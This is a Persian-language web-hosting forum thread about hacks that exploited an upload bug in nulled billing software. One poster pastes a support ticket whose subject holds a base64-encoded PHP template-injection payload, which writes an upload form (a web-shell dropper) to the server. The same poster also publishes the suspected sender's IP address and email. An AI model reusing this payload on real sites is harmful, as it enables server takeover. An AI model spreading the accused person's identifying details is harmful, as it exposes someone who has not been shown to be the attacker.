اگه امنیتتون خوب باشه هیچ مشکلی پیش نمیاد.
بزارید اینقدر تیکت بزنن تا جر بخورن.
شما چرا اینقدر گندش کردین این قضیه رو آخه.
این تاپیک بهتره که به تاریخ پیوسته بشه.
اگه امنیتتون خوب باشه هیچ مشکلی پیش نمیاد.
بزارید اینقدر تیکت بزنن تا جر بخورن.
شما چرا اینقدر گندش کردین این قضیه رو آخه.
این تاپیک بهتره که به تاریخ پیوسته بشه.
با سلام
میدونم در حدی نیستم که بخام نظر بدم و این نظر، نظر شخصیه!
به نظر من کار خوبی میکنه هر کی هک کرده
چون طرف هیچ وقت نمیفهمید که سایتش باگ داره
بعدشم هاستینگ ها خودشون نسخه نال شده استفاده میکنند بعد که میرسه نوبت کاربرانشون میگن باید لایتکس بگیری خداییش این دیگه اخرشه
خدایی هرکی بوده دمش گرم
تایید میکنم
من خودم اولین کسی بودم که فهمیدن این آپلودر کجا و چه طور باز میشه میتونید تاپیکو بینید اما با موبایل شخصیم به چندین شرکت تماس گرفتم و باگ رو گفتم
در ضمن کسی که واسه خود و مشتری هاش ارزش قائل باشه از نال استفاده نمیکنه
ولی 90 درصد اشخاصی بودند که نال شده استفاده کردند تا لایتکس
همکارانی که هک نشده اند هم می توانند شکایت کنند ؟
مرکز میزبانی وب نیک سرور NikServer.COM | شماره تماس : 9109.9713-021
هاست و نمایندگی هاست لینوکس | هاست و نمایندگی هاست دانلود | سرور مجازی ایران و اروپا
الان یه نفر تیکت داد
کاربر: hamid rahmati #16
بخش: بخش فروش
موضوع: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}اهمیت: Mediumمحتوای سوال=============================
hi
----------------------------
IP Address: 46.19.139.252
هم باگ رفع شده
هم پوشه های دانلود و تمپلت و ... درد دسترس نیس
الان با آیپیش میتونم شکایت کنم؟
مشهدیه
---------- Post added at 06:09 PM ---------- Previous post was at 06:07 PM ----------
وای خدا این مشتریمه
الان کل هاست هاشو دلیت میزنم
---------- Post added at 06:15 PM ---------- Previous post was at 06:09 PM ----------
takfile22@yahoo.com
اینم ایمیلش
در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)